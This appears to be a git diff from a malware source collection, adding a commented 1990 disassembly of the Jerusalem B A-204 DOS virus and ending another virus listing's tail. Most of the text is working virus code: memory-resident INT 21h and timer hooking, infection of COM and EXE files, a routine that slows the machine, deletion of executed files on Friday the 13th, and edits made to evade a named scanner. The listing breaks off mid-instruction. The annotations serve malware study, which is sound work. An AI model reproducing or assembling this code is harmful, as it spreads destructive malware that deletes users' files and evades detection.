8B1E7000 MOV BX,[Y0070H] +0000:04BD 06 PUSH ES +0000:04BE 1F POP DS +0000:04BF B43F MOV AH,03FH +0000:04C1 CD21 INT 021H +0000:04C3 721C X04C3: JB X04E1 +0000:04C5 03F9 ADD DI,CX +0000:04C7 33C9 XOR CX,CX +0000:04C9 8BD1 MOV DX,CX +0000:04CB B80042 MOV AX,04200H +0000:04CE CD21 INT 021H + +"JV.MOC" PAGE 0010 + +0000:04D0 BE0500 MOV SI,0005H +0000:04D3 B90500 MOV CX,0005H +0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT + R (SI) +0000:04D9 8BCF MOV CX,DI +0000:04DB 33D2 XOR DX,DX +0000:04DD B440 MOV AH,040H +0000:04DF CD21 INT 021H +0000:04E1 720D X04E1: JB X04F0 +0000:04E3 E9BC00 JMP X05A2 +0000:04E6 B91C00 X04E6: MOV CX,001CH +0000:04E9 BA4F00 MOV DX,004FH +0000:04EC B43F MOV AH,03FH +0000:04EE CD21 INT 021H +0000:04F0 724A X04F0: JB X053C +0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H +0000:04F8 A15D00 MOV AX,Y005DH +0000:04FB A34500 MOV Y0045H,AX +0000:04FE A15F00 MOV AX,Y005FH +0000:0501 A34300 MOV Y0043H,AX +0000:0504 A16300 MOV AX,Y0063H +0000:0507 A34700 MOV Y0047H,AX +0000:050A A16500 MOV AX,Y0065H +0000:050D A34900 MOV Y0049H,AX +0000:0510 A15300 MOV AX,Y0053H +0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H +0000:0518 7401 JZ X051B +0000:051A 48 DEC AX +0000:051B F7267800 X051B: MUL WORD PTR [Y0078H] +0000:051F 03065100 ADD AX,[Y0051H] +0000:0523 83D200 ADC DX,0000H +0000:0526 050F00 ADD AX,000FH +0000:0529 83D200 ADC DX,0000H +0000:052C 25F0FF AND AX,0FFF0H +0000:052F A37C00 MOV Y007CH,AX +0000:0532 89167E00 MOV [Y007EH],DX +0000:0536 051007 ADD AX,0710H +0000:0539 83D200 ADC DX,0000H +0000:053C 723A X053C: JB X0578 +0000:053E F7367800 DIV WORD PTR [Y0078H] +0000:0542 0BD2 OR DX,DX +0000:0544 7401 JZ X0547 +0000:0546 40 INC AX +0000:0547 A35300 X0547: MOV Y0053H,AX +0000:054A 89165100 MOV [Y0051H],DX +0000:054E A17C00 MOV AX,Y007CH +0000:0551 8B167E00 MOV DX,[Y007EH] +0000:0555 F7367A00 DIV WORD PTR [Y007AH] +0000:0559 2B065700 SUB AX,[Y0057H] +0000:055D A36500 MOV Y0065H,AX +0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H +0000:0566 A35D00 MOV Y005DH,AX +0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H +0000:056F 33C9 XOR CX,CX +0000:0571 8BD1 MOV DX,CX +0000:0573 B80042 MOV AX,04200H +0000:0576 CD21 INT 021H + +"JV.MOC" PAGE 0011 + +0000:0578 720A X0578: JB X0584 +0000:057A B91C00 MOV CX,001CH +0000:057D BA4F00 MOV DX,004FH +0000:0580 B440 MOV AH,040H +0000:0582 CD21 INT 021H +0000:0584 7211 X0584: JB X0597 +0000:0586 3BC1 CMP AX,CX +0000:0588 7518 JNZ X05A2 +0000:058A 8B167C00 MOV DX,[Y007CH] +0000:058E 8B0E7E00 MOV CX,[Y007EH] +0000:0592 B80042 MOV AX,04200H +0000:0595 CD21 INT 021H +0000:0597 7209 X0597: JB X05A2 +0000:0599 33D2 XOR DX,DX +0000:059B B91007 MOV CX,0710H +0000:059E B440 MOV AH,040H +0000:05A0 CD21 INT 021H +0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H +0000:05A8 7404 JZ X05AE +0000:05AA B449 MOV AH,049H +0000:05AC CD21 INT 021H +0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH +0000:05B4 7431 JZ X05E7 +0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:05BB 2E8B167400 MOV DX,CS:[Y0074H] +0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H] +0000:05C5 B80157 MOV AX,05701H +0000:05C8 CD21 INT 021H +0000:05CA B43E MOV AH,03EH +0000:05CC CD21 INT 021H +0000:05CE 2EC5168000 LDS DX,CS:[Y0080H] +0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H] +0000:05D8 B80143 MOV AX,04301H +0000:05DB CD21 INT 021H +0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH] +0000:05E2 B82425 MOV AX,02524H +0000:05E5 CD21 INT 021H +0000:05E7 07 X05E7: POP ES +0000:05E8 1F POP DS +0000:05E9 5F POP DI +0000:05EA 5E POP SI +0000:05EB 5A POP DX +0000:05EC 59 POP CX +0000:05ED 5B POP BX +0000:05EE 58 POP AX +0000:05EF 9D POPF +0000:05F0 2EFF2E1700 JMP CS:[Y0017H] +0000:05F5 0000 X05F5: ADD [BX+SI],AL +0000:05F7 0000 ADD [BX+SI],AL +0000:05F9 0000 ADD [BX+SI],AL +0000:05FB 0000 ADD [BX+SI],AL +0000:05FD 0000 ADD [BX+SI],AL +0000:05FF 004D00 ADD [DI+00H],CL +0000:0602 000F ADD [BX],CL +0000:0604 0000 ADD [BX+SI],AL +0000:0606 0000 ADD [BX+SI],AL + +"JV.MOC" PAGE 0012 + +0000:0608 0000 ADD [BX+SI],AL +0000:060A 0000 ADD [BX+SI],AL +0000:060C 0000 ADD [BX+SI],AL +0000:060E 0000 ADD [BX+SI],AL +0000:0610 CD20 INT 020H +0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH +0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID +0000:0619 F02F LOCK DAS +0000:061B 018E1E3C ADD [BP+Y03C1EH],CX +0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX +0000:0623 048E ADD AL,08EH +0000:0625 1E PUSH DS +0000:0626 8E1EFFFF MOV DS,[Y0FFFFH] +0000:062A FFFF ??? DI +0000:062C FFFF ??? DI +0000:062E FFFF ??? DI +0000:0630 FFFF ??? DI +0000:0632 FFFF ??? DI +0000:0634 FFFF ??? DI +0000:0636 FFFF ??? DI +0000:0638 FFFF ??? DI +0000:063A FFFF ??? DI +0000:063C 7C1F JL X065D +0000:063E DE3E8D29 ESC 037H,[Y0298DH] +0000:0642 1400 ADC AL,00H +0000:0644 1800 SBB [BX+SI],AL +0000:0646 F1 DB 0F1H +0000:0647 1F POP DS +0000:0648 FFFF ??? DI +0000:064A FFFF ??? DI +0000:064C 0000 ADD [BX+SI],AL +0000:064E 0000 ADD [BX+SI],AL +0000:0650 0000 ADD [BX+SI],AL +0000:0652 0000 ADD [BX+SI],AL +0000:0654 0000 ADD [BX+SI],AL +0000:0656 0000 ADD [BX+SI],AL +0000:0658 0000 ADD [BX+SI],AL +0000:065A 0000 ADD [BX+SI],AL +0000:065C 0000 ADD [BX+SI],AL +0000:065E 0000 ADD [BX+SI],AL +0000:0660 CD21 INT 021H +0000:0662 CB RET ; INTERSEGMENT +0000:0663 0000 X0663: ADD [BX+SI],AL +0000:0665 0000 ADD [BX+SI],AL +0000:0667 0000 ADD [BX+SI],AL +0000:0669 0000 ADD [BX+SI],AL +0000:066B 0000 ADD [BX+SI],AL +0000:066D 2020 AND [BX+SI],AH +0000:066F 2020 AND [BX+SI],AH +0000:0671 2020 AND [BX+SI],AH +0000:0673 2020 AND [BX+SI],AH +0000:0675 2020 AND [BX+SI],AH +0000:0677 2000 AND [BX+SI],AL +0000:0679 0000 ADD [BX+SI],AL +0000:067B 0000 ADD [BX+SI],AL +0000:067D 2020 AND [BX+SI],AH + +"JV.MOC" PAGE 0013 + +0000:067F 2020 AND [BX+SI],AH +0000:0681 2020 AND [BX+SI],AH +0000:0683 2020 AND [BX+SI],AH +0000:0685 2020 AND [BX+SI],AH +0000:0687 2000 AND [BX+SI],AL +0000:0689 0000 ADD [BX+SI],AL +0000:068B 0000 ADD [BX+SI],AL +0000:068D 0000 ADD [BX+SI],AL +0000:068F 0000 ADD [BX+SI],AL +0000:0691 0D6B6F OR AX,06F6BH +0000:0694 6465 JZ X06FB +0000:0696 6572 JNZ X070A +0000:0698 7A2E JPE X06C8 +0000:069A 6578 JNZ X0714 +0000:069C 6520 JNZ X06BE +0000:069E 613A JNO X06DA +0000:06A0 6B6F JPO X0711 +0000:06A2 6465 JZ X0709 +0000:06A4 6572 JNZ X0718 +0000:06A6 2E6578 JNZ X0721 +0000:06A9 650D JNZ X06B8 +0000:06AB 0000 ADD [BX+SI],AL +0000:06AD 0000 ADD [BX+SI],AL +0000:06AF 0000 ADD [BX+SI],AL +0000:06B1 0000 ADD [BX+SI],AL +0000:06B3 0000 ADD [BX+SI],AL +0000:06B5 0000 ADD [BX+SI],AL +0000:06B7 0000 ADD [BX+SI],AL +0000:06B9 0000 ADD [BX+SI],AL +0000:06BB 0000 ADD [BX+SI],AL +0000:06BD 0000 ADD [BX+SI],AL +0000:06BF 0000 ADD [BX+SI],AL +0000:06C1 0000 ADD [BX+SI],AL +0000:06C3 0000 ADD [BX+SI],AL +0000:06C5 0000 ADD [BX+SI],AL +0000:06C7 0000 ADD [BX+SI],AL +0000:06C9 0000 ADD [BX+SI],AL +0000:06CB 0000 ADD [BX+SI],AL +0000:06CD 0000 ADD [BX+SI],AL +0000:06CF 0000 ADD [BX+SI],AL +0000:06D1 0000 ADD [BX+SI],AL +0000:06D3 0000 ADD [BX+SI],AL +0000:06D5 0000 ADD [BX+SI],AL +0000:06D7 0000 ADD [BX+SI],AL +0000:06D9 005718 ADD [BX+018H],DL +0000:06DC 0825 OR [DI],AH +0000:06DE A5 MOVSW +0000:06DF FEC5 INC CH +0000:06E1 07 POP ES +0000:06E2 1E PUSH DS +0000:06E3 0210 ADD DL,[BX+SI] +0000:06E5 07 POP ES +0000:06E6 57 PUSH DI +0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH +0000:06EB 0104 ADD [SI],AX +0000:06ED 7F70 JG X075F + +"JV.MOC" PAGE 0014 + +0000:06EF 0010 ADD [BX+SI],DL +0000:06F1 07 POP ES +0000:06F2 1D001C SBB AX,01C00H +0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP +0000:06F9 0C1B OR AL,01BH +0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH] +0000:06FF F24D REPNE DEC BP +0000:0701 360E PUSH CS +0000:0703 0300 ADD AX,[BX+SI] +0000:0705 0000 ADD [BX+SI],AL +0000:0707 00EE ADD DH,CH +0000:0709 002A X0709: ADD [BP+SI],CH +0000:070B 0F POP CS +0000:070C 42 INC DX +0000:070D 01C1 ADD CX,AX +0000:070F 0DB44C OR AX,04CB4H +0000:0712 B000 MOV AL,00H +0000:0714 CD21 X0714: INT 021H +0000:0716 4D DEC BP +0000:0717 7344 JAE X075D +0000:0719 6F73 JG X078E + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.jerub204.asm b/MSDOS/Virus.MSDOS.Unknown.jerub204.asm new file mode 100644 index 00000000..238195e6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jerub204.asm @@ -0,0 +1,977 @@ + Virus : Jerusalem Version B Variant A-204 +Disassembled by : Righard Zwienenberg + Steenwijklaan 302 + 2541 RT The Hague + The Netherlands + Data : +31-70-3898822, V22,V22b,HST,MNP,CM + Voive : +31-70-3675379 +FidoNet address : 2:512/2.3 + Used Software : ASMGEN, DEBUG and D86-Disassembler + Date : 20 june 1990 + +Note : All Values are hex. If a value is followd by d (e.g. 30d) it means +30 decimal. + +Note : This disassembly consists of two programs. The original program was +a dummy file (20h bytes long) containing 1Fh times 90 RET and 01h time +C3 RET. + +0100 E9 92 00 JMP 0195 ; JUMP -> 0195h + +0103 db 2A,41,2D,32,30,34,2A ; *A-204* never used + +010A dw 00 01 ; Startaddress original program +010C dw 01 56 ; Startaddress-offset original program +010E db 00 ; Trigger for destruction (delete file) + ; Always zero, but if it is Friday the 13th and the year is + ; not equal 1987 this byte is set to one +010F dw 00 00 ; Storing place for original AX (read-only word) +0111 dw 20 00 ; Length of Original Program (0020h) +0113 dw A5 FE ; Storing place for original BX of INT 08h vector +0115 dw 00 F0 ; Storing place for original ES of INT 08h vector +0117 dw 60 14 ; Storing place for original BX of INT 21h vector +0119 dw 2B 02 ; Storing place for original ES of INT 21h vector +011B dw 56 05 ; Storing place for original BX of INT 24h vector +011D dw DE 0C ; Storing place for original ES of INT 24h vector +011F dw 40 7E ; Storing place for timer for 30 minutes trigger + ; By init. set to 7E90h + + ; The following words are never used by the virus. The are used + ; by a routine starting at 0398h which is executed when INT 21h + ; is called with AH=DEh. This never happens in the code. +0121 dw 00 00 ; +0123 dw 00 00 ; +0125 dw 00 00 ; +0127 dw 00 00 ; +0129 dw 00 00 ; +012B dw 00 00 ; +012D dw 00 E8 ; +012F dw 06 EC ; + +0131 dw 91 16 ; Storing place for original ES +0133 dw 80 00 ; Storing place for BX. Never read again + +0135 00 00 00 80 00 + +0139 dw 91 16 ; Storing place for original ES + +013B 5C 00 + +013D dw 91 16 ; Storing place for original ES + +013F 6C 00 ; + +0141 dw 91 16 ; Temp. storing place for original ES +0143 dw 00 20 ; Temp. storing place for AX +0145 dw 0D 1F ; Temp. storing place for ES+10h +0147 dw 5F 21 ; Storing place for AX +0149 dw A1 16 ; Temp. storing place for ES+10h +014B dw 00 F0 ; Temp. storing place for AX +014D db 02 ; Temp. storing place for AL +014E db 00 ; COM/EXE indicator + ; 0 = EXE-File + ; 1 = COM-File +0151 dw 30 01 ; Temp. storing place for DX +0153 dw 23 00 ; Temp. storing place for AX + +0155 20 01 + +0157 dw 4A 00 ; Read Only!!! The code only read this word to substract it + ; from AX + +0159 D4 06 D4 06 + +015D dw 98 03 ; Temp. Storing place to store AX +015F dw 10 07 ; Probably startaddress of virus in mem +0161 dw 84 19 ; Never used!!! 1984h is stored here by the code +0163 dw C5 00 ; 00C5h is being read and put back later by the code +0165 dw 99 03 ; Temp. storing place for AX + +0167 1C 00 00 00 90 90 90 90 C3 + +0170 dw 05 00 ; Storing place for file handle (BX) +0172 dw 20 00 ; Storing place for file attributes + ; bit 0 = read only + ; bit 1 = hidden file + ; bit 2 = system file + ; bit 3 = volume label + ; bit 4 = subdirectory + ; bit 5 = archive bit + ; bit 8 = shareable (Novell Network) +0174 dw D5 14 ; Storing place for file date (DX) +0176 dw 99 83 ; Storing place for file time (CX) +0178 dw 00 02 ; 0200h=512d Used as multiplier/divider +017A dw 10 00 ; 0001h= 1d Used as multiplier/divider +017C dw 20 3E ; Temp. storing place for AX +017E dw 00 00 ; Temp. storing place for DX +0180 dw B9 42 ; Storing place for DX of ASCIZ-Filename +0182 dw 1A 9B ; Storing place for DS of ASCIZ-Filename + +0184 db 43,4F,4D,4D,41,4E,44,2E,43,4F,4D ; COMMAND.COM + ; May not become infected + +018F dw 01 00 ; Storing place for variable-result of free-memory-scan + ; 0000h : not enough memory available + ; 0001h : enough memory available + +0191 00 00 00 00 + +0195 FC CLD ; Clear Direct +0196 B4 E0 MOV AH,0E0 ; This is the check if the +0198 CD 21 INT 021 ; virus is already active + ; in memory. INT 21h with + ; AH=E0h will return AX=0300h + ; if the virus is active. +019A 80 FC E0 CMP AH,0E0 ; AH>=E0h? +019D 73 16 JAE 01B5 ; Yes: -> 01B5h +019F 80 FC 03 CMP AH,3 ; AH<-03h? +01A2 72 11 JB 01B5 ; Yes: -> 01B5h + ; INT 21h with AH= + ; DDh,DEh,E0h + ; are self-defined. + + ; SetUp for + ; Executing original program + ; We come here if an infected + ; program is executed and the + ; virus is already active in + ; memory. +01A4 B4 DD MOV AH,0DD ; +01A6 BF 00 01 MOV DI,0100 ; Destination Index = 0100h +01A9 BE 10 07 MOV SI,0710 ; Source Index = 0710h +01AC 03 F7 ADD SI,DI ; Source Index:= 0810h + ; At this place the original + ; Program is located +01AE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=20h (length original + ; Program) +01B3 CD 21 INT 021 ; + + ; Here we come when the virus + ; is not yet in memory +01B5 8C C8 MOV AX,CS ; AX=Code Segment +01B7 05 10 00 ADD AX,010 ; AX:=AX+10h +01BA 8E D0 MOV SS,AX ; Stack Segment:=AX +01BC BC 00 07 MOV SP,0700 ; StackPointer = 0700h +01BF 50 PUSH AX ; Store AX +01C0 B8 C5 00 MOV AX,0C5 ; AX = C5h +01C3 50 PUSH AX ; Store AX +01C4 CB RETF ; -> C5h + +01C5 FC CLD ; Clear Direct +01C6 06 PUSH ES ; Store ES +01C7 2E 8C 06 31 00 CS MOV W[031],ES ; Store ES +01CC 2E 8C 06 39 00 CS MOV W[039],ES ; in storage places +01D1 2E 8C 06 3D 00 CS MOV W[03D],ES ; +01D6 2E 8C 06 41 00 CS MOV W[041],ES ; +01DB 8C C0 MOV AX,ES ; AX=ES +01DD 05 10 00 ADD AX,010 ; AX=AX+10h +01E0 2E 01 06 49 00 CS ADD W[049],AX ; Add AX (ES+10h) to 0149h +01E5 2E 01 06 45 00 CS ADD W[045],AX ; and 0145h +01EA B4 E0 MOV AH,0E0 ; AH=E0h (Self defined) +01EC CD 21 INT 021 ; CALL INT 21h + +01EE 80 FC E0 CMP AH,0E0 ; AH>=0Eh? +01F1 73 13 JAE 0206 ; Yes: -> 0206 +01F3 80 FC 03 CMP AH,3 ; AH=03h? Must be if the + ; viruscode is in memory + ; and interrupt 21h is called + ; with AH=E0h. + +01F6 07 POP ES ; Restore original ES +01F7 2E 8E 16 45 00 CS MOV SS,W[045] ; SS=ES+10h +01FC 2E 8B 26 43 00 CS MOV SP,W[043] ; +0201 2E FF 2E 47 00 CS JMP D[047] ; + +0206 33 C0 XOR AX,AX ; AX=0000h +0208 8E C0 MOV ES,AX ; ES=0000h +020A 26 A1 FC 03 ES MOV AX,W[03FC] + + ; Here the A-204 variant + ; differs for the first + ; time from the original + ; Jerusalem Version B virus. +020E 26 A0 FE 03 ES MOV AL,B[03FE] ; These two line have been +0212 2E A3 4B 00 CS MOV W[04B],AX ; changed in order + ; to avoid being + ; detected by ViruScan from + ; John McAfee. + +0216 2E A2 4D 00 CS MOV B[04D],AL +021A 26 C7 06 FC 03 F3 A5 ES MOV W[03FC],0A5F3 +0221 26 C6 06 FE 03 CB ES MOV B[03FE],0CB +0227 58 POP AX +0228 05 10 00 ADD AX,010 +022B 8E C0 MOV ES,AX +022D 0E PUSH CS ; Store CS +022E 1F POP DS ; DS=CS +022F B9 10 07 MOV CX,0710 ; CX=0710h +0232 D1 E9 SHR CX,1 ; CX >> 1 (CX:=0308h) +0234 33 F6 XOR SI,SI ; SI=0000h +0236 8B FE MOV DI,SI ; DI=0000h +0238 06 PUSH ES ; Store ES +0239 B8 42 01 MOV AX,0142 ; AX=0142h +023C 50 PUSH AX ; Store AX +023D EA FC 03 00 00 JMP 0:03FC + +0242 8C C8 MOV AX,CS ; AX=CS +0244 8E D0 MOV SS,AX ; SS=CS +0246 BC 00 07 MOV SP,0700 ; SP=0700h +0249 33 C0 XOR AX,AX ; AX=0000h +024B 8E D8 MOV DS,AX ; DS=0000h +024D 2E A1 4B 00 CS MOV AX,W[04B] ; Restore AX +0251 A3 FC 03 MOV W[03FC],AX ; Store AX +0254 2E A0 4D 00 CS MOV AL,B[04D] ; Restore AL +0258 A2 FE 03 MOV B[03FE],AL ; Store AL +025B 8B DC MOV BX,SP ; BX=SP +025D B1 04 MOV CL,4 ; CL=04h +025F D3 EB SHR BX,CL ; BX >> 4 +0261 83 C3 10 ADD BX,010 ; BX=BX+10h +0264 2E 89 1E 33 00 CS MOV W[033],BX ; Store BX. Why I don't know, + ; the storing place is never + ; read again +0269 B4 4A MOV AH,04A ; +026B 2E 8E 06 31 00 CS MOV ES,W[031] ; Restore ES +0270 CD 21 INT 021 ; Adjust Memory Block Size + ; (SETBLOCK) + +0272 B8 21 35 MOV AX,03521 ; Get original INT 21h +0275 CD 21 INT 021 ; vector + +0277 2E 89 1E 17 00 CS MOV W[017],BX ; Store BX and ES of INT 21h +027C 2E 8C 06 19 00 CS MOV W[019],ES ; vector +0281 0E PUSH CS ; Store CS +0282 1F POP DS ; DS=CS +0283 BA 5B 02 MOV DX,025B ; DX=025Bh +0286 B8 21 25 MOV AX,02521 ; Set new INT 21h +0289 CD 21 INT 021 ; vector on DS:025Bh + +028B 8E 06 31 00 MOV ES,W[031] ; Restore original ES +028F 26 8E 06 2C 00 ES MOV ES,W[02C] ; +0294 33 FF XOR DI,DI ; DI=0000h +0296 B9 FF 7F MOV CX,07FFF ; CX=7FFFh +0299 32 C0 XOR AL,AL ; AL=0000h +029B F2 AE REPNE SCASB ; +029D 26 38 05 ES CMP B[DI],AL ; +02A0 E0 F9 LOOPNE 029B ; No Flags: DEC CX -> 02A2h + ; IF CX<>0 and not equal + ; -> 029B +02A2 8B D7 MOV DX,DI ; DX=DI +02A4 83 C2 03 ADD DX,3 ; DX=DX+03h +02A7 B8 00 4B MOV AX,04B00 ; AX=4B00h +02AA 06 PUSH ES ; Store ES +02AB 1F POP DS ; Restore DS (DS:=ES) +02AC 0E PUSH CS ; Store CS +02AD 07 POP ES ; Restore ES (ES:=CS) +02AE BB 35 00 MOV BX,035 ; BX=35h +02B1 1E PUSH DS ; Store Registers +02B2 06 PUSH ES +02B3 50 PUSH AX +02B4 53 PUSH BX +02B5 51 PUSH CX +02B6 52 PUSH DX + +02B7 B4 2A MOV AH,02A ; Get Current Date +02B9 CD 21 INT 021 ; DL=day + ; DH=month + ; CX=year + ; AL=Day of the week + +02BB 2E C6 06 0E 00 00 CS MOV B[0E],0 ; Set Trigger for deleting + ; infected files to 00h +02C1 81 F9 C3 07 CMP CX,07C3 ; Is year 1987 ? +02C5 74 30 JE 02F7 ; Yes: -> 02F7h +02C7 3C 05 CMP AL,5 ; Is it Friday ? +02C9 75 0D JNE 02D8 ; No: -> 02D8h +02CB 80 FA 0D CMP DL,0D ; Is it 13th ? +02CE 75 08 JNE 02D8 ; No: -> 02D8h + ; Yes: it is Friday + ; the 13th and the + ; year is not equal 1987 +02D0 2E FE 06 0E 00 CS INC B[0E] ; Set Trigger for deleting + ; infected files to 01h +02D5 EB 20 JMP 02F7 ; JUMP -> 02F7h + +02D7 90 NOP + +02D8 B8 08 35 MOV AX,03508 ; Get original INT 8h +02DB CD 21 INT 021 ; vector + +02DD 2E 89 1E 13 00 CS MOV W[013],BX ; Store original BX +02E2 2E 8C 06 15 00 CS MOV W[015],ES ; and ES of INT 08h vector +02E7 0E PUSH CS +02E8 1F POP DS +02E9 C7 06 1F 00 90 7E MOV W[01F],07E90 ; Store 30d minutes into + ; timer interrupt. This + ; value is decreased by + ; one 18.2 times per second +02EF B8 08 25 MOV AX,02508 ; Set new INT 8h vector +02F2 BA 1E 02 MOV DX,021E ; to DS:021Eh +02F5 CD 21 INT 021 ; + +02F7 5A POP DX ; Restore Registers +02F8 59 POP CX +02F9 5B POP BX +02FA 58 POP AX +02FB 07 POP ES +02FC 1F POP DS +02FD 9C PUSHF ; Store Flags +02FE 2E FF 1E 17 00 CS CALL D[017] ; Call original INT 21h + ; address + +0303 1E PUSH DS ; Restore DS +0304 07 POP ES ; Store ES +0305 B4 49 MOV AH,049 ; Free Memory +0307 CD 21 INT 021 ; + +0309 B4 4D MOV AH,04D ; Get ExitCode of +030B CD 21 INT 021 ; SubProgram (WAIT) + ; Stored in AL + +030D B4 31 MOV AH,031 ; AX=31[AL]h +030F BA 00 06 MOV DX,0600 ; DX=600h +0312 B1 04 MOV CL,4 ; CL=04h +0314 D3 EA SHR DX,CL ; DX >> 4 (DX=60H) +0316 83 C2 10 ADD DX,010 ; DX=DX+10h (DX=70h) + ; Program Size in Paragraphs + ; is 70h Bytes +0319 CD 21 INT 021 ; Terminate but Stay Resident + +031B 32 C0 XOR AL,AL ; Clear AL +031D CF IRET ; Interrupt Return + + ; 031Eh is the new INT 08h + ; vector. This routine is + ; called 18.2 times per + ; second +031E 2E 83 3E 1F 00 02 CS CMP W[01F],2 ; Timer decreased til 02h? +0324 75 17 JNE 033D ; No: -> 033D + + ; Yes: now 32 minutes are + ; passed since infection +0326 50 PUSH AX ; Store Registers +0327 53 PUSH BX +0328 51 PUSH CX +0329 52 PUSH DX +032A 55 PUSH BP + +032B B8 02 06 MOV AX,0602 ; Scroll box with coordinates +032E B7 87 MOV BH,087 ; (5h,5h),(10h,10h) two +0330 B9 05 05 MOV CX,0505 ; lines upwards +0333 BA 10 10 MOV DX,01010 ; +0336 CD 10 INT 010 ; + +0338 5D POP BP ; Restore Registers +0339 5A POP DX +033A 59 POP CX +033B 5B POP BX +033C 58 POP AX +033D 2E FF 0E 1F 00 CS DEC W[01F] ; Decrease Timer-Trigger + ; This now becomes 01h +0342 75 12 JNE 0356 ; If 0: -> 0356h +0344 2E C7 06 1F 00 01 00 CS MOV W[01F],1 ; Timer-Trigger set to 01h +034B 50 PUSH AX ; Store AX +034C 51 PUSH CX ; Store CX +034D 56 PUSH SI ; Store SI +034E B9 01 40 MOV CX,04001 ; CX=4001h +0351 F3 AC REP LODSB ; Load byte [SI] into AL and + ; advance SI, done CX times. + ; This is the routine which + ; decreases the speed of the + ; machine til 1/5th of the + ; original. 32 minutes after + ; infection this routine is + ; executes 18.2 times a second +0353 5E POP SI ; Restore SI +0354 59 POP CX ; Restore CX +0355 58 POP AX ; Restore AX +0356 2E FF 2E 13 00 CS JMP D[013] ; Jump to original INT 08h + ; address + + ; Here we come if INT 21h is + ; called +035B 9C PUSHF ; Store Flags +035C 80 FC E0 CMP AH,0E0 ; AH=0Eh ? +035F 75 05 JNE 0366 ; No: -> 0366h +0361 B8 00 03 MOV AX,0300 ; AX=0300h +0364 9D POPF ; Restore Flags +0365 CF IRET ; Interrupt Return + +0366 80 FC DD CMP AH,0DD ; AH=DDh? +0369 74 13 JE 037E ; Yes: -> 037Eh +036B 80 FC DE CMP AH,0DE ; AH=DEh? +036E 74 28 JE 0398 ; Yes: -> 0398h + ; INT 21h is never called + ; with AH=DEh. So the routine + ; at 0398h is never used + ; (seems) + +0370 3D 00 4B CMP AX,04B00 ; Load & Execute ? +0373 75 03 JNE 0378 ; No: -> 0378h +0375 E9 B4 00 JMP 042C ; Yes: -> 042Ch +0378 9D POPF ; Restore Flags +0379 2E FF 2E 17 00 CS JMP D[017] ; Jmp to original + ; INT 21h address + + ; Execute original program +037E 58 POP AX +037F 58 POP AX ; Restore AX +0380 B8 00 01 MOV AX,0100 ; AX=0100h +0383 2E A3 0A 00 CS MOV W[0A],AX ; Store AX +0387 58 POP AX ; Restore AX +0388 2E A3 0C 00 CS MOV W[0C],AX ; Store AX +038C F3 A4 REP MOVSB ; +038E 9D POPF ; Restore Flags +038F 2E A1 0F 00 CS MOV AX,W[0F] ; AX=0000h +0393 2E FF 2E 0A 00 CS JMP D[0A] ; JUMP -> CS:0100h + ; This executes the original + ; program + + + ; This routine is called + ; when INT 21h with AH=DEh + ; is called which never + ; happens in the code. I + ; have to investigate it + ; a bit more. Til then + ; it remains without comments. +0398 83 C4 06 ADD SP,6 +039B 9D POPF +039C 8C C8 MOV AX,CS +039E 8E D0 MOV SS,AX +03A0 BC 10 07 MOV SP,0710 +03A3 06 PUSH ES +03A4 06 PUSH ES +03A5 33 FF XOR DI,DI +03A7 0E PUSH CS +03A8 07 POP ES +03A9 B9 10 00 MOV CX,010 +03AC 8B F3 MOV SI,BX +03AE BF 21 00 MOV DI,021 +03B1 F3 A4 REP MOVSB +03B3 8C D8 MOV AX,DS +03B5 8E C0 MOV ES,AX +03B7 2E F7 26 7A 00 CS MUL W[07A] +03BC 2E 03 06 2B 00 CS ADD AX,W[02B] +03C1 83 D2 00 ADC DX,0 +03C4 2E F7 36 7A 00 CS DIV W[07A] +03C9 8E D8 MOV DS,AX +03CB 8B F2 MOV SI,DX +03CD 8B FA MOV DI,DX +03CF 8C C5 MOV BP,ES +03D1 2E 8B 1E 2F 00 CS MOV BX,W[02F] +03D6 0B DB OR BX,BX +03D8 74 13 JE 03ED +03DA B9 00 80 MOV CX,08000 +03DD F3 A5 REP MOVSW +03DF 05 00 10 ADD AX,01000 +03E2 81 C5 00 10 ADD BP,01000 +03E6 8E D8 MOV DS,AX +03E8 8E C5 MOV ES,BP +03EA 4B DEC BX +03EB 75 ED JNE 03DA +03ED 2E 8B 0E 2D 00 CS MOV CX,W[02D] +03F2 F3 A4 REP MOVSB +03F4 58 POP AX +03F5 50 PUSH AX +03F6 05 10 00 ADD AX,010 +03F9 2E 01 06 29 00 CS ADD W[029],AX +03FE 2E 01 06 25 00 CS ADD W[025],AX +0403 2E A1 21 00 CS MOV AX,W[021] +0407 1F POP DS +0408 07 POP ES +0409 2E 8E 16 29 00 CS MOV SS,W[029] +040E 2E 8B 26 27 00 CS MOV SP,W[027] +0413 2E FF 2E 23 00 CS JMP D[023] + + ; We come here if B[0Eh]=1, + ; which means Friday 13th, + ; year<>1987. This routine + ; deletes the loaded file. +0418 33 C9 XOR CX,CX ; Clear all bits of the File + ; Attribute +041A B8 01 43 MOV AX,04301 ; +041D CD 21 INT 021 ; Put File Atributes + +041F B4 41 MOV AH,041 ; +0421 CD 21 INT 021 ; Delete a File (Unlink) + +0423 B8 00 4B MOV AX,04B00 + +0426 9D POPF ; Get Flags +0427 2E FF 2E 17 00 CS JMP D[017] + + ; We come here each time a + ; file is loaded with the + ; load and execute call + ; (INT 21h, AX=4B00h) +042C 2E 80 3E 0E 00 01 CS CMP B[0E],1 ; Is it Friday 13th, + ; year<>1987? +0432 74 E4 JE 0418 ; Yes: -> 0418h +0434 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle -1 ??? +043B 